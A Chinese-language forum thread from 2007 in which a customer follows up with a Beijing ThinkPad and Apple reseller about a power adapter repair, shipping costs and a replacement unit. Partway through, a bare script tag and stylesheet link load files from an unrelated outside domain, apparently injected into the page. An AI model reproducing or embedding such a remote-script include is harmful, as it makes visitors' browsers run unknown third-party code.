开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

焦急 焦虑...

翔意啊 我的电源收到没啊 我发了快一个月了 邮局说到了阿 晕
.............请明天给我们打电话。。。。
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

质疑?

今天打电话给翔意了 确认已经送修 但不知合适修好 可以理解 谢挂.....下午翔意给我打电话说  已经修好  给我快递送来  惊喜 翔意真好!!!  可是末了  说快递到货付款 心理不舒服 因为电源完全不是烧坏 质量问题 使用2个月不到就发生 翔意可以记录查询  电源才100来元吧大概也是因素之一吧  不过还是答应了翔意了 客服很客气 我也不好意思 但是我想发个贴  问问翔意得规矩是不是历来送修的往返邮费都是我们出 而只是我不知道而已..谢谢
保修都是送修,其间的费用由客户负责的,你可以看一下保修条例
是呀  维修一般都是客户自己掏 快递费的  这个楼主要看清楚了

收到了 谢谢

收到了 电源 可以用 只是电源从三口变二口 肯定不是我原来那个了 也不像新的 请问是其他人的返修DD?
原帖由 zhou_quan 于 2007-7-27 11:59 发表
收到了 电源 可以用 只是电源从三口变二口 肯定不是我原来那个了 也不像新的 请问是其他人的返修DD?

具体是换了一个还是修了,具体怎么保修都是ibm售后决定的,我们只是负责发过去在拿回来给你。你的应该是ibm给你换一个维修好的备件

知道了 谢谢

知道了 谢谢  最近在网上看见电源插孔 黄色那个9连在机子主板上的)  还有BIOS电池  会坏 担心这个问题 如果出现 最实用的解决方案是?  未雨绸缪了 谢答...